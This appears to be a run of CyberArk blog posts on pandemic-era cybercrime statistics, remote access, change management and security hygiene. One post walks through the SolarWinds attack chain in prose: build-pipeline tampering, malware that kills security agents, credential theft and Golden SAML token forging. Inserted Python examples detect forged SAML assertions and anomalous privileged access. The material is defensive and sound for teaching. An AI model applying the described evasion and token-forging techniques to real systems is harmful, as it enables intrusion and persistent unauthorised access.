Almost a year ago, the world turned upside down and seemingly everything changed due to the COVID-19 pandemic. In that time, entire workforces went – and stayed – home, cloud adoption skyrocketed and digital transformation has become a business imperative at scale. This confluence of events has also spelled “opportunity” for attackers – a fact that is widely reflected in cyber crime data.

As we approach the one-year mark, here’s a look back at some of the most eye-opening industry cybersecurity statistics from this period of unprecedented change.

An Attack Explosion

In the six weeks following lockdown, the World Health Organization (WHO) cautioned that scammers were preying on pandemic fear and uncertainty by impersonating the WHO, in addition to targeting WHO systems and employees directly, at a rate five times greater than in the same period in 2019.

While attackers mostly stuck to their favorite tried-and-true tactics to launch their attacks – phishing and identity compromise – the sheer volume of attacks was truly staggering, and caught many people distracted, unaware and unprepared. TechRepublic reported a 667% rise in spear-phishing attacks in March 2020 alone, and by April, the FBI had seen a 400% increase in cyber attacks.

Ransomware attacks also surged by 800% amid the rapidly evolving global crisis, prompting INTERPOL to issue a warning to healthcare institutions on the front lines about the growing threat. And Microsoft researchers warned of criminal groups using popular strains like Robbinhood, Maze and REvil to carry out “long-tail” attacks, waiting weeks or even months to deploy the ransomware, decrypt massive swaths of high-value data and demand crippling, multi-million dollar ransoms.

Meanwhile, as organizations accelerated cloud adoption to meet customer needs and support distributed workforces, a 630% increase in cloud-based attacks was recorded between January and April, mostly targeting services like Microsoft 365, and mostly involving the use of stolen credentials.

And the attacks kept coming: 70% of organizations hosting data or workloads in the public cloud experienced a security incident within the last year, with multi-cloud organizations reporting up to twice as many incidents as single-platform adopters.

Ponemon Institute estimated that new risks and challenges related to remote work would tack an additional $137K onto the 2020 global average total cost of a data breach, for a grand total of roughly $4M per incident.

Breaking that down, healthcare has the highest industry average cost at $7.13M per breach, and the United States has the highest country average cost at $8.64M.

Personally Identifiable Information (PII) has the highest cost per record at $150 each. Meanwhile, according to Deloitte, basic PII such as name and credit card information can be sold on the dark web in bulk for $0.10 or less.

Cracks in the Digital Armor

No one was prepared for the drastic shift foisted upon the world by the global pandemic. In an instant, organizations had to scramble to connect home offices, support new devices and bring new collaboration tools online as quickly as possible. Too often, security became an afterthought. At the same time, remote workers were trying to figure out how to do their jobs from the confines of their homes. It wasn’t long until security workarounds in the name of productivity became dangerous, persistent habits.

According to Malwarebytes, 20% of companies said they faced a security breach specifically as a result of a remote worker, and 24% spent unbudgeted dollars on cybersecurity breaches or malware attacks after the world went into quarantine.

So where is it all falling apart? As it turns out – pretty much everywhere. Let’s examine one of many “cracks” in the digital armor.

Device Cross-Pollination

The Q4 2020 CyberArk State of Remote Work Survey found that 69% of remote workers use corporate devices for personal use. Even worse, 57% admitted to letting other members of their household use their work devices for non-work activities like shopping, gaming, or schoolwork. This risky device-sharing activity almost doubled since CyberArk conducted a similar survey in spring 2020.

It’s estimated that one in 36 mobile devices has high-risk applications installed. When employees mix work and leisure on their device, these vulnerabilities provide potential openings for attackers to steal credentials and gain a foothold in an organization. And attackers are targeting these web-based applications in earnest: the 2020 Verizon Data Breach Investigations Report highlights a year-over-year two-fold increase in web application breaches, to 43%. Stolen credentials were used in over 80% of these cases.

In short, the more employees use personal devices for work purposes (or use work devices for personal activities), the more organizational risk they create. And it’s happening. A lot.

But even if remote workers adhere to security best practices and follow corporate protocols by the book, spotting a spoof within a pile of legitimate work emails is hard to do. CSO reports that 94% of malware is delivered via email, and it’s often cleverly disguised.

So, What Can We Do?

There is a cyber attack every 39 seconds. Cyber crime damages are projected to total $6 trillion annually by 2021, while global ransomware damages are expected to total $20 billion this year.

Yet despite rising awareness, the average time to identify a breach in 2020 was still a whopping 207 days, according to the Ponemon Institute. Then it was another 280 days, on average, between identification and containment – more than enough time for an attacker to cause disruption or damage.

Murphy’s law states that anything that can go wrong, will go wrong. That’s why it’s so important to assume you’ve already been breached and focus on breaking the attack chain. This means identifying, isolating and stopping attackers from compromising identities and gaining privilege, before they can do harm.

In the digital realm of good vs. evil, much more needs to be done, yet there are not enough cybersecurity professionals to do it. Cybersecurity Ventures estimates there will be 3.5 million unfilled cybersecurity jobs by 2021. Globally, the workforce would need to grow by 145% to meet rising demand and eliminate the cybersecurity labor shortage.

This shortage is only getting worse, according to a recent study by ESG and the Information Systems Security Association. The study shows that 70% of cybersecurity professionals say their organization has felt the impact of the skills shortage through symptoms such as growing workloads, unfilled job openings and the inability of professionals to learn or use cybersecurity technologies to their full potential. Moreover, 18% of cybersecurity professionals from this study have been in the field for three years or less, and most started as IT professionals.

ESG concludes that a holistic approach can begin to close this gap – calling for ongoing cybersecurity education that begins at the public school level, as well as career mapping, planning and development for both new and established professionals as cyber threats continue to evolve.

That won’t happen overnight, much as the world may need it to.

Since there is no caped crusader ready to swoop in and save the day, organizations must learn to think like an attacker and treat their systems as though they’ve already been breached, rather than assuming (or hoping) that they will be spared. That doesn’t have to be as grim as it sounds: A mindset shift and proactive stance are critical first steps toward a stronger security posture.
The Anatomy of the SolarWinds Attack Chain https://www.cyberark.com/blog/the-anatomy-of-the-solarwinds-attack-chain/ Tue, 23 Feb 2021 14:03:07 +0000 https://www.cyberark.com/?p=112803 The Privilege Pathway

Imagine there’s an attacker lurking inside your network right now. Do you have the ability to find out and respond before they can cause harm? Now imagine your adversary has privileged access to virtually every file and system in your IT environment and can impersonate any human, application or machine identity, at any time. Could you spot the attacker hiding in plain sight?

These are just some of the many questions security teams are asking themselves in the wake of the massive SolarWinds attack that leveraged a digital supply chain vector to potentially reach into more than 18,000 organizations around the world.

While details of the attack and its implications continue to surface, it’s clear that the compromise of identity and manipulation of privileged access was instrumental in the success of this attack. And today, there’s much to be learned from examining the tactics, techniques and procedures (TTPs) used by the adversary to achieve what The Washington Post described as “the computer network equivalent of sneaking into the State Department and printing perfectly forged U.S. passports.”

We asked Lavi Lazarovitz, head of CyberArk Labs, to help us deconstruct the attack so organizations can better understand what they’re up against and prioritize efforts to reduce the most risk. For a deeper technical dive and guidance on risk mitigation, join our webinar on March 18 and save the date for a big-picture view of what major breaches like ‘Solorigate’ mean for both defenders and attackers on April 22 (U.S. registration, EMEA registration and APJ coming soon!).

Deconstructing the Three Major Stages of the SolarWinds Attack

Where It All Began

In early December 2020, several organizations discovered and reported breaches to their networks within a few days of each other. It didn’t take long for security and threat analysts to connect the dots, as the initial foothold into each of these companies was identical: a Trojanized update to a popular infrastructure monitoring and management platform – SolarWinds’ Orion. Soon, many other organizations and government agencies discovered similar infections.

But why Orion? “Because it’s connected everywhere – from switches and routers, to firewalls, virtualization infrastructure, Active Directory, storage management tools and more,” explains Lazarovitz. “All of these connections rely on credentials, which in most cases are highly privileged. Simply put, Orion has its ‘hooks’ in all facets of an enterprise, making it the perfect target for an adversary.”

Attack Stage 1: Infect the Orion Software Pipeline

While it’s still unclear exactly how the adversaries first infected SolarWinds Orion, forensic evidence reported in the press indicates they worked hard to learn the company’s code structure and terminology before launching the attack. But how they managed to gain entry is inconsequential, since threat actors, especially well-resourced nation-state actors, will nearly always find a way to get inside. It’s also why defenders must always “assume breach.”

To establish a foothold into the organization, the threat actor compromised the “heart” of the CI/CD pipeline, where code is tested, wrapped, containerized and signed, then successfully changed SolarWinds’ source code. The attacker deployed malware, now infamously known as “SunSpot,” which ran with high privileges, scanning for Orion builds.

With surgical precision – and without tipping off developers or engineers – the malware changed source file code names (ever so slightly) to deploy a backdoor. Following the build update, the backdoor code was deleted and the original file names were restored.

Lazarovitz emphasizes the complexity of such an operation, noting, “The actor had to silence warnings in the code and make sure the deployment of the malicious code was flawless.” Making it seem as though they’d never been there was no easy task.

These revelations have prompted many organizations to re-examine the security of their own CI/CD pipelines, and particularly, pipeline orchestrators and infrastructure managers, since these assets have extensive privileged access. These organizations are asking their supply chain vendors to do the same.

Attack Stage 2: Target SolarWinds Customers

After a dormant period of about two weeks – an intentional pause that helped the attacker cover their tracks – the malicious payload started performing reconnaissance and operational security checks.

One of these checks aimed to identify hashes linked to specific endpoint security agents and forensics tools that could expose the running malware. If an agent or tool on this “checklist” was identified in the environment, the malware attempted to terminate it and, if unsuccessful, suspended itself.

However, if the malware did not find these specific hashes, or if it successfully terminated the agents, it moved to the next stage: calling home, carrying out commands received from C&C servers and disabling any vulnerable endpoint security agents.

“Generally speaking,” Lazarovitz explains, “the level of privilege the malware has upon initial infection can spell the difference between an infected endpoint and an entire network takeover.” Enforcing the principle of least privilege across all endpoints can help prevent lateral movement, making it significantly harder for attackers to accomplish their goals. But in the case of this digital supply chain attack, the malware already had elevated privileges when it reached each Orion customer organization.

Note, with the benefit of 20/20 hindsight, credential theft protection policies protecting Orion’s credentials database may have slowed the attack down by requiring the actor to use tools and techniques that increase the chance of exposure.

But as it was, “Orion’s privileged credentials were accessible to the attacker once inside, and almost certainly used in the next stage of the attack,” says Lazarovitz.

Attack Stage 3: Privilege Escalation to High-Value Targets

Based on what’s been reported, the actor most likely harvested credentials stored in Orion’s database, such as those for traditional Tier0 assets like Active Directory, firewalls, and infrastructure and networking management software. This would enable rapid escalation of privileges. And with these powerful credentials in hand, the threat actor could have owned the targeted network right away.

“But here’s where it got interesting,” says Lazarovitz. The attacker began making moves to establish persistence, possessing sufficient privileges to not only add a backdoor account, but also an entire trusted tenant completely under their control. This provided continued access to the target network’s applications, services and data using the new trusted tenant accounts. Further, it eliminated the impact of any potential password changes by the organization and allowed the attacker to bypass multi-factor authentication completely.

Doing this required a mix of sophisticated methods, and most notably, the Golden SAML technique.

Using highly privileged credentials, the attacker successfully accessed and manipulated the victim organization’s SAML token-signing certificate and forged digital SAML tokens that provide single sign-on access to virtually any system and application in the environment, both on-premises and in the cloud. Since SAML token-signing certificates are almost never changed, the attacker could persist in the network for lengthy periods of time without fear of detection, and ultimately, achieve the intended goal.

“The Golden SAML technique highlights the fact that if the primary secret of the identity provider is compromised – for example, Active Directory Federation Services, then the threat actor ‘owns’ the source of truth and BECOMES their own identity provider. They can impersonate any user they want – no matter the user’s password, no matter the level of privilege and no matter if MFA is implemented,” says Lazarovitz. He stresses the importance of implementing strong Identity Security policies and controls that restrict privileged access to these Tier0 systems, reduce exposure and enable earlier detection.

To learn more about the Golden SAML technique, which was first identified by CyberArk Labs in 2017, visit the CyberArk Threat Research Blog.
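As an added illustration of the detection angle Lazarovitz raises (example code, not CyberArk’s or the article’s own), the Python below correlates an identity provider’s issuance records with a service provider’s sign-in records: an assertion that a service accepted but that the IdP never logged as issued, or one carrying an implausibly long validity window, is a candidate forged token. The log lines, field names and the one-hour lifetime policy are constructed assumptions; real AD FS and application logs differ.

```python
"""Detection heuristic for forged (Golden) SAML assertions.

Added example, not code from CyberArk or from the article's sources. The idea:
an identity provider such as AD FS records every assertion it signs, so an
assertion accepted by a service provider that the IdP never logged as issued
was signed somewhere else, i.e. with a stolen token-signing key. Log formats
below are constructed for illustration.
"""
from datetime import datetime, timedelta, timezone

# Constructed IdP audit records: one line per assertion the IdP actually signed.
IDP_ISSUANCE_LOG = [
    "2021-02-10T09:00:12Z event=issue assertion_id=_a1 user=alice@corp.example mfa=true",
    "2021-02-10T09:15:40Z event=issue assertion_id=_a2 user=bob@corp.example mfa=true",
    "2021-02-10T10:02:03Z event=issue assertion_id=_a3 user=carol@corp.example mfa=false",
]

# Constructed service-provider records: assertions presented at sign-in, with
# the validity window each assertion carried (NotBefore / NotOnOrAfter).
SP_LOGIN_LOG = [
    "2021-02-10T09:00:14Z event=accept assertion_id=_a1 user=alice@corp.example "
    "not_before=2021-02-10T09:00:12Z not_on_or_after=2021-02-10T10:00:12Z",
    "2021-02-10T09:15:42Z event=accept assertion_id=_a2 user=bob@corp.example "
    "not_before=2021-02-10T09:15:40Z not_on_or_after=2021-02-10T10:15:40Z",
    # The IdP has no record of this one, and it is valid for a year: forged.
    "2021-02-10T11:42:05Z event=accept assertion_id=_zz9 user=admin@corp.example "
    "not_before=2021-02-10T11:40:00Z not_on_or_after=2022-02-10T11:40:00Z",
]

MAX_ASSERTION_LIFETIME = timedelta(hours=1)   # assumed IdP token-lifetime policy
CORRELATION_WINDOW = timedelta(minutes=5)     # tolerated clock skew / delivery delay


def parse_ts(value: str) -> datetime:
    """Parse the constructed ISO-8601 UTC timestamp format used in the logs."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def parse_line(line: str) -> dict:
    """Parse 'timestamp key=value key=value ...' into a dict (constructed format)."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["timestamp"] = parse_ts(ts)
    return rec


def find_suspect_assertions(idp_lines, sp_lines,
                            max_lifetime=MAX_ASSERTION_LIFETIME,
                            window=CORRELATION_WINDOW):
    """Return (assertion_id, user, reasons) for accepted assertions that look forged."""
    issued = {}
    for line in idp_lines:
        rec = parse_line(line)
        if rec.get("event") == "issue":
            issued[rec["assertion_id"]] = rec

    findings = []
    for line in sp_lines:
        rec = parse_line(line)
        if rec.get("event") != "accept":
            continue
        reasons = []
        source = issued.get(rec["assertion_id"])
        if source is None:
            # Signed with the IdP's key but never issued by the IdP: Golden SAML signature.
            reasons.append("no IdP issuance record")
        else:
            if source["user"] != rec["user"]:
                reasons.append("user differs from IdP record")
            if not (source["timestamp"] <= rec["timestamp"] <= source["timestamp"] + window):
                reasons.append("accepted outside correlation window")
        # Forged tokens are often minted with very long validity to support persistence.
        lifetime = parse_ts(rec["not_on_or_after"]) - parse_ts(rec["not_before"])
        if lifetime > max_lifetime:
            reasons.append(f"lifetime {lifetime} exceeds policy")
        if reasons:
            findings.append((rec["assertion_id"], rec["user"], reasons))
    return findings


if __name__ == "__main__":
    for aid, user, reasons in find_suspect_assertions(IDP_ISSUANCE_LOG, SP_LOGIN_LOG):
        print(f"SUSPECT {aid} ({user}): " + "; ".join(reasons))
```

In a real deployment the same correlation runs over AD FS audit events and the cloud application’s sign-in logs, and a signing certificate that has not been rotated since such a finding should be treated as compromised.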

The Right Frame of Mind: An Assume Breach Mentality

The vast majority of all cyber attacks involve the compromise of identity and manipulation of privileged access. The SolarWinds breach was no exception.

As traditional network security barriers dissolve, the ‘assume breach’ mindset has never been more critical. By assuming that any identity – whether human or machine – in your network may have been compromised, you can turn your attention to identifying, isolating and stopping threats before they gain privileged access, execute lateral movement and do harm.
Three Best Practices to Get Privileged Remote Access Right for the New Normal Workforce https://www.cyberark.com/blog/three-best-practices-to-get-privileged-remote-access-right-for-the-new-normal-workforce/ Wed, 17 Feb 2021 14:05:43 +0000 https://www.cyberark.com/?p=112740 Three best practices

While I haven’t seen many of my co-workers in person in almost a year, we’ve found new, collaborative ways to tackle projects – and along the way, we’ve managed to forge even closer connections. We’ve come up with exciting new ideas in virtual meetings, live-chatted through successful product sprints, and even streamed virtual cooking classes together. Thanks to digital technology, the “watercooler” may be gone, but the culture and camaraderie aren’t.

After settling into the new normal, many employees around the world seem to agree that there is some upside to an otherwise once unimaginable situation. They feel connected and productive at home and want to keep working there long-term. Yet, while many businesses want to enable their employees with flexible models, a major ongoing challenge is securing their distributed workforces, particularly for those requiring privileged access.

In 2020, VPN usage skyrocketed to 277 million downloads worldwide as IT teams worked to bring, and keep, remote workers online. But after months of working from home, 78% of employees said challenges in connecting to corporate systems were their No. 1 gripe with the new working norm. And considering the number of recent breaches linked to remote access systems, it’s clear that providing secure and simple access for remote employees is far from a perfect science.

Every remote worker, third-party vendor, or contractor requiring access to your sensitive company systems needs a way to get inside. The question is, how do you keep the bad guys from doing the same?

Here are best practices your organization can take today to not only bolster remote privileged access security controls but also minimize headaches for your remote employees and trusted third parties:

1. Start with strong authentication. This may seem obvious at this point, but it bears repeating that the ability to authenticate each individual identity – whether a remote worker or vendor – with high accuracy is table stakes for any cybersecurity program today. And for individuals requiring privileged access, it is mission-critical to enforce multi-factor authentication (MFA) any time they require access to sensitive internal resources. With no shortage of MFA options out there (keys, tokens, push notifications, texts, and biometrics, to name a few), what’s less obvious is finding a method that’s both secure and minimally bothersome for the end-user. Productivity and overall morale hinge on that decision – so choose wisely.

2. Re-visit your VPN use. VPNs, if not properly implemented and maintained, can be exploited by attackers to gain privileged access to sensitive systems and data. Attackers know they can skip time-consuming steps in their attack chain (like stealing non-privileged credentials and moving laterally and vertically to escalate privileges) by starting with targeting privileged users connecting from home via VPN. Insecure or misconfigured home routers also introduce risk in the VPN equation – and give attackers an easy “in” to corporate systems. What’s more, home routers often establish a permanent VPN connection, meaning anyone on the home network could access company resources. The 57% of remote workers who admit to allowing household members to use their corporate devices for schoolwork, gaming, and shopping are making attackers’ jobs even easier.

While I’m focusing here on corporate IT infrastructure, it’s also important to acknowledge attacks on operational technology (OT) are on the rise. Recent headlines show how dangerous it can be if attackers gain remote access to critical infrastructure and manipulate systems that power and supply the planet. VPNs are insufficient for these environments and should not be used to provide secure remote access to privileged users, such as operators and engineers. Instead, rigorous security controls must be implemented to secure identities throughout their lifecycle, access should only be brokered via secure gateways connecting directly to critical targets and every privileged session must be monitored and recorded to reduce risk.

3. Don’t mess with people’s workflows. To quote Salesforce CEO Marc Benioff, “Speed is the new currency of business.” And privileged users – from IT admins to cloud security architects – have a lot to do, and need to do it fast. They need to be able to log into their workstations and access systems and applications with minimal disruption. But in distributed work environments, these privileged users often require multiple RDP connections each day – and manually establishing connections over and over is a major pain and slows things down. Remote desktop connection managers can help centralize that process and make life easy on end-users, but they can also create blind spots for security teams. To maintain visibility and minimize risk, make sure that each time a remote connection manager is used to launch a session, the session is isolated, monitored, and recorded. This is really the best of both worlds: it removes end-user friction while giving security teams the information needed to maintain a full audit trail.

Also, consider ways to help your admins, so they can help everyone else. In the remote work world, working nine-to-five has stretched substantially, and admins are feeling the pressure to grant access quickly and smoothly to a disparate, “always-on” workforce. Solutions with push notifications and the ability for admins to get direct requests on their smartphones help fast-track end-user demands while giving admins more flexibility.

Finding the right balance between security and business agility takes time and adjustments along the way. Join our on-demand webinar to dig deeper into these recommendations and explore new features to help you take remote access enablement to the next level. You’ll see how CyberArk Remote Access (formerly Alero) can help your digital business prosper – from the office to the kitchen table, on the road, and everywhere in-between.

]]>
Beyond Buy-In: True Change Is Only Achieved Through Accountability https://www.cyberark.com/blog/beyond-buy-in-true-change-is-only-achieved-through-accountability/ Fri, 12 Feb 2021 14:00:57 +0000 https://www.cyberark.com/?p=112635 Change management

If there is one concept that has dominated the tech world over the past few years, it’s … disruption. It seems the entire industry has been driven by a mission to shake up everything indiscriminately and render anything more than a few years old obsolete. And this has led to a lot of good and even more dramatic change. But it’s also led to a lot of uncertainty – some of which has to do with the word disruption itself.

The idea of tech disruption really started with Harvard Business School Professor Clayton Christensen and his 1997 book The Innovator’s Dilemma. However, what Christensen was really describing wasn’t so much disruption as it was replacement or displacement – smaller companies using technology to usurp the dominant powers of old industry titans. Yet the idea of “disruption” took hold, fueling a general wariness about any new technological process or protocol. Organizations began struggling with people who saw these “new ways” as adding more hurdles to their everyday routine – making it harder for them to do their jobs. Besides, isn’t security someone else’s responsibility anyway?

In our first conversation with banking risk and IT security leader Gerry Owens, now CEO of GOTAB IT RISK inc., we explored how truly effective change must be driven from the top. But from there, how do you implement acceptance and accountability across all levels of the business? We continued our discussion to find out.

Transformation, Not Disruption

Owens has firsthand knowledge of the challenges facing the implementation of technological change in highly regulated industries. For him, there’s only one way for operational change to take hold, grow and thrive – and it’s not through “buy-in.” It’s through actual understanding. It is holistic transformation vs. outright disruption or displacement, as it were.

When it comes to cybersecurity implementations, everyone needs to be seen as a stakeholder and communicated with accordingly. “You have to have a transparent conversation,” Owens says. “You have to say, ‘Number one, we are vulnerable, and we’re exposed. Number two, you are responsible for that exposure as much as anybody in this organization’.” For example, when communicating with development teams, he likens applications with hardcoded privileged credentials to “hiding your keys under the doormat.” This type of conversation helps change the developers’ perspective as they gain a new appreciation for how this practice exposes the firm.

Successful cybersecurity programs that prioritize compliance and accountability require common objectives among key stakeholders. Owens suggests forming a group with shared but different responsibilities to drive this sense of shared accountability – bringing together a CISO, a CTO, even representatives from the technology vendor and integrator so that, as he puts it, “everybody goes to bed at night equally concerned about the goals that need to be achieved.”

Equally important, he notes, is working closely with business and IT process owners to understand current workflows and to embed their expertise into the design of new controls. By asking questions like, “Who really needs elevated privileges to access what systems, why are they required, and at what stages of this process?” you may uncover opportunities to not only improve security but also streamline tasks.

For example, says Owens, “When you sit down and have a serious discussion, holding the CTO and people manager accountable for the access, you may find that 2,000 sysadmins who require far-reaching access becomes 900. And you’ve already reduced risk within that organization.”

Stages of the initiative can then be prioritized and implemented more efficiently, driving quick and measurable “wins” that help build confidence, support, and momentum for the next implementation wave.

Team Players

So how does this 360-degree accountability take hold? Owens explains that while there must be a certain sense of “this is how we do things now” rigidity to quell naysayers, true transformation requires a collective effort, iteration, and time. Here are some ways it can start:

  • Coach, don’t demand. Owens likens change management to coaching a team – you work with your players until mapped out plays become second nature, rather than benching those unable to execute immediately. Teams need to understand what they are doing, why they are doing it and the expected outcome – without these key ingredients, you can’t expect to achieve your goals. Remember that people are always impacted by change: never underestimate the significance of the disruption in their environment, and always explain the “why” – the true purpose behind the plays.
  • Lead with empathy and make it personal. For large-scale initiatives, gaining support from critical user groups like IT admins can be challenging as their daily lives will be most impacted. Show empathy but also challenge perceptions by demonstrating how new practices can actually boost efficiency. Emphasizing nonrepudiation also goes a long way in driving support, Owens explains. “Stronger security controls not only protect our organization, they also protect individual users who can be targeted by attackers based on role or perceived levels of privileged access.”
  • Inspire passion and celebrate successes. “Passion is contagious,” Owens says. “If you have passion for what you’re doing, you will spread it to others working around you – from your leadership team to your change champions to your project teams.” Extending that passion and continuously celebrating successes will make everyone feel part of the movement forward. It’s important all stakeholders feel a sense of pride – that ‘they did this’, as opposed to ‘this was done to them.’
  • Communicate often. Owens knows firsthand that it can be difficult for security professionals to successfully “market” what they do. But during times of great organizational change, trumpeting milestones – and communicating challenges – is essential, because it gives security leaders an opportunity to build awareness and trust through transparency and help everyone address and avoid roadblocks. Large-scale programs often surface and remediate unrelated process or security issues – be sure to call those out. Organizations may consider sending out monthly newsletters with program updates or other similar means of consistent communication to keep everyone looped in. At the end of the day, Owens says, “It’s important the organization understands the positive business impact of the initiative – and the collective effort that’s behind the transformation.”
  • Demonstrate leadership. Every change journey will face differing opinions, pushback, and even open defiance. In these scenarios, you’ll have to demonstrate strong, decisive leadership and be ready to make tough calls. Says Owens, “I’ve had a few conversations with executives who have said, ‘That sounds like the right thing to do, but sometimes we don’t get the support from our senior leaders to invoke tough actions.’ This is typically a sign that the program leadership has not been empowered, either because the initiative itself has not received the appropriate amount of recognition and prioritization across the firm, or the program leaders do not have the confidence to assertively escalate issues.”
  • Align your business strategy to risk. Security initiatives should be aligned to the operational risk oversight of your organization. This function should be able to communicate current and emerging risks your initiative aims to address, and how it will achieve defined risk reduction metrics. However, do not “oversell the risk card,” Owens cautions, as this could lead to false expectations and set your program up for failure. “It is best to deliver fact-based risk insights (industry experiences that relate to your existing business processes) as opposed to fear-based prophecy (using generic terms that suggest the firm will suffer cataclysmic failures if your program is not implemented).” That said, helping businesses understand the inherent risk associated with their processes is necessary, and partnering with other control functions in your organization such as HR, legal and compliance teams can help emphasize the importance of the initiative in driving down organizational risk.

According to Owens, what it boils down to is that companies have gotten so used to terms like “disruption” and “buy-in” that they don’t see how ill-fitting they’ve become. When a “disruptor” has to go level by level in a company and ask for “buy-in,” it makes one side seem like they’re bulldozing through established workflows regardless of their effectiveness, and it gives the other the illusion that they have the option to bow out. That leads to stagnation, inefficiency and confusion. Instead, companies need to preach that shared effort and shared accountability don’t just lead to change for change’s sake.

It leads to evolution.

]]>
Get Back to the Basics with Your Company’s Cybersecurity Practices https://www.cyberark.com/blog/get-back-to-the-basics-with-your-companys-cybersecurity-practices/ Tue, 09 Feb 2021 14:00:12 +0000 https://www.cyberark.com/?p=112571 Cybersecurity Best Practices

Basic hygiene best practices go beyond hand washing – even if you’re doing lots of that these days. The same hygiene concept extends into the digital world of cybersecurity. In an age of near-constant attacks, organizations can’t afford to get caught with “dirt under their fingernails.” And yet, lax or risky practices persist in many companies.

Let’s get back to the basics, revisiting fundamental “cybersecurity hygiene” best practices – across people, process and technology areas – to help mitigate the risk of cyber infection, enable the business, and boost overall security health.

Take a good look at your people. People are an organization’s greatest asset; however, at the hands of motivated attackers, they can also become the weakest link. Numerous social engineering and phishing techniques allow attackers to target individuals with access to valuable systems and data and attempt to steal their credentials. Historically, their “prey” was IT admins and top-level executives with privileged access to every corner of an organization. But in today’s digital, cloud-based, and largely virtual work environments, a new population of “big phish” is emerging. And it’s not necessarily who you’d expect.

Recent attacks on researchers and even third-party transportation providers involved in COVID-19 vaccine development and distribution are evidence of this. As another example, some companies are adopting tools to measure remote worker productivity. Privacy concerns notwithstanding, this creates new treasure troves of highly sensitive data that may be accessed by HR, legal, and other non-technical teams. All of these individuals can now be considered privileged users, and as such, they’re attractive targets for attackers.

Get serious about cybersecurity awareness training. According to recent CyberArk research, nearly half of employees haven’t received remote work-specific cybersecurity training. This means those newly privileged users – along with many other employees and third-party vendors – may not be prepared for a well-crafted email in their CEO’s name that disguises a malicious PDF attachment. Schedule regular sessions to review cybersecurity best practices like never clicking on links or opening attachments before verifying the sender, using strong, unique passwords, following processes to guard privileged accounts and more.

Conduct an ethical phishing exercise. Send out a series of realistic emails and see how many employees take the bait by clicking on attachments or links. Even better, launch a targeted spear-phishing simulation geared toward privileged users – and use the results in subsequent training to help ensure these power users don’t fall for the phish. Also consider third-party Red Team penetration testing exercises to help identify hidden vulnerabilities and attack vectors.

Revisit your corporate device policy. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently warned of increasing attacks on remote workers’ devices via phishing, brute force login attempts, and other methods to gain access to corporate cloud resources. The agency offered a number of strong recommendations for bolstering cloud security, such as implementing conditional access, enforcing strong privileged access management (PAM) controls, and restricting email forwarding – and also suggested prohibiting personal device use altogether. While some organizations may not be ready or able to draw this hard-line, in a time when 69% of remote workers admit to using corporate devices for personal use, every company should review their corporate device policies with a critical eye. As part of this, consider implementing minimum standards and guidelines for strengthening remote workers’ home networks, such as changing default router credentials and using strong WiFi passwords.

Establish a “normal” baseline for network activity. Take advantage of analytics to model baseline behaviors and benchmark risk levels. This will help speed the detection of anomalies and indicators of compromise (IOCs), such as a privileged user who suddenly accesses credentials at an unusual time of day or from an unusual location, demonstrates excessive usage or other abnormal trends.
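The baseline-and-anomaly idea above, worked through in code. This is an added example, not part of the original post or any CyberArk product: it learns each privileged user’s normal access hours, locations and daily retrieval volume from a constructed history of credential-retrieval events, then flags new events that fall outside that baseline (unusual hour, unusual location, excessive usage, or a user with no history at all). The log format, user names and locations are all constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime

# Event shape assumed for this example: (user, ISO-8601 timestamp, source location).
# A real deployment would map these fields from the vault / PAM audit log.


def generate_history(user="dba_alice", days=20, location="NYC-office"):
    """Constructed 'normal' history: one retrieval per hour, 09:00-16:00, same location."""
    events = []
    for day in range(1, days + 1):
        for hour in range(9, 17):
            events.append((user, f"2021-01-{day:02d}T{hour:02d}:00:00", location))
    return events


def build_baseline(events):
    """Per user: hours and locations ever seen, plus the busiest day on record."""
    hours = defaultdict(set)
    locations = defaultdict(set)
    daily = defaultdict(lambda: defaultdict(int))
    for user, ts, loc in events:
        t = datetime.fromisoformat(ts)
        hours[user].add(t.hour)
        locations[user].add(loc)
        daily[user][t.date()] += 1
    return {
        user: {
            "hours": hours[user],
            "locations": locations[user],
            "max_daily": max(daily[user].values()),
        }
        for user in hours
    }


def detect_anomalies(baseline, new_events, volume_factor=2.0):
    """Return (user, when, category, detail) findings for events outside the baseline.

    Categories: no_baseline, unusual_hour, unusual_location, excessive_usage.
    The volume check fires when a day's count exceeds volume_factor x the busiest baseline day.
    """
    findings = []
    per_day = defaultdict(int)
    for user, ts, loc in new_events:
        t = datetime.fromisoformat(ts)
        b = baseline.get(user)
        if b is None:
            # Never seen before: could be a new admin, or an attacker-created account.
            findings.append((user, ts, "no_baseline", "user has no recorded history"))
            continue
        if t.hour not in b["hours"]:
            findings.append((user, ts, "unusual_hour", f"hour {t.hour:02d} never seen"))
        if loc not in b["locations"]:
            findings.append((user, ts, "unusual_location", f"location {loc} never seen"))
        per_day[(user, t.date())] += 1
    for (user, day), count in per_day.items():
        limit = volume_factor * baseline[user]["max_daily"]
        if count > limit:
            findings.append((user, day.isoformat(), "excessive_usage",
                             f"{count} retrievals vs baseline max {baseline[user]['max_daily']}"))
    return findings


def run_demo():
    """Constructed new-day activity: three anomalous events plus one burst of normal-looking ones."""
    new_events = [
        ("dba_alice", "2021-01-25T03:15:00", "NYC-office"),       # 03:00 never seen
        ("dba_alice", "2021-01-25T10:05:00", "Unknown-VPN-exit"),  # location never seen
        ("svc_newacct", "2021-01-25T10:30:00", "NYC-office"),      # no history at all
    ]
    # 17 retrievals in one day at normal hours/location: more than 2x the busiest baseline day (8).
    new_events += [
        ("dba_alice", f"2021-01-26T{9 + i % 8:02d}:{(i // 8) * 20:02d}:00", "NYC-office")
        for i in range(17)
    ]
    baseline = build_baseline(generate_history())
    return detect_anomalies(baseline, new_events)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```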

Clearly define privileged user policies. Administrative privileged accounts and credentials were instrumental in extending the recent SolarWinds supply chain attack to thousands of public and private organizations around the world. To reduce risk, it’s important to clearly define how sysadmins and other highly privileged users should access systems via privileged accounts – and under what conditions, based on the principle of least privilege – and safeguard their privileged credentials from theft and abuse. Make sure HR has policies in place to emphasize IT managers’ responsibility for not only defining the roles of their teams, but also for monitoring and managing privileged activity, and working with IT to enforce security policies. This must be a shared responsibility, not something security teams should shoulder alone.

